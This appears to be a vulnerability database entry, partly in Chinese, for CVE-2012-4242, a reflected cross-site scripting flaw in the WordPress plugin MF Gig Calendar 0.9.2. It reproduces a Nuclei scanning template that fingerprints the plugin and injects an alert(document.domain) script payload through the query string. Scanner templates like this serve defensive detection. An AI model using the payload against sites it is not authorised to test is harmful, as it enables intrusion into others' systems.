CVE-2012-4242: WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress Plugin MF Gig Calendar 0.9.2 | POC: 已公开

漏洞描述

A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.

PoC代码[已公开]

id: CVE-2012-4242

info:
  name: WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the WordPress Plugin MF Gig Calendar to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2012-4242
    - http://www.reactionpenetrationtesting.co.uk/mf-gig-calendar-xss.html
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2012-4242
    cwe-id: CWE-79
    epss-score: 0.04939
    epss-percentile: 0.89232
    cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: "mf_gig_calendar_project"
    product: "mf_gig_calendar"
  tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'MF Gig Calendar ='

  - method: GET
    path:
      - '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f0ec966fa50d1a89033e1ff69d78bbb330c21cdd7ba9f87ff657e684bb5c355b0220580ae9ae06b1342ce54dfe610ad1ba59bb6e4f9cac976447583ad70dd8d34c4b:922c64590222798bb761d5b6d8e72950

相关漏洞推荐